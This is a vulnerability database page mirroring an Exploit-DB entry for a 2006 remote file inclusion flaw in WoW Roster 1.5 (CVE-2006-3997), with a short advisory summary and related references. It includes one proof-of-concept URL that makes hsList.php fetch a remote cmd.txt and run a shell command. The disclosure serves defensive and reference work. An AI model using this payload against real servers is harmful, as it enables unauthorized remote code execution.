Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbSkulmaticEDB-ID:28317
HistoryAug 01, 2006 - 12:00 a.m.

WoW Roster 1.5 - 'hsList.php?subdir' Remote File Inclusion

2006-08-0100:00:00
skulmatic
www.exploit-db.com
31

AI Score

7.4

Confidence

Low

JSON
source: https://www.securityfocus.com/bid/19269/info

WoW Roster is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.

A successful exploit may allow unauthorized users to execute remote PHP scripts; other attacks are also possible.

http://www.example.com/[wow_roster_path]/hsList.php?subdir=http://www.example.com/cmd.txt?&cmd=ls

Related

checkpoint_advisories 1
cve 1
cvelist 1
nvd 1
checkpoint_advisories
checkpoint_advisories
WoWRoster subdir Parameter PHP Code Execution - Ver2 (CVE-2006-3997)
2014-01-28 00:00:00
cve
cve
CVE-2006-3997
2006-08-05 01:04:00
cvelist
cvelist
CVE-2006-3997
2006-08-05 01:00:00
nvd
nvd
CVE-2006-3997
2006-08-05 01:04:00

AI Score

7.4

Confidence

Low

JSON
Related for EDB-ID:28317
checkpoint_advisories1cve1cvelist1nvd1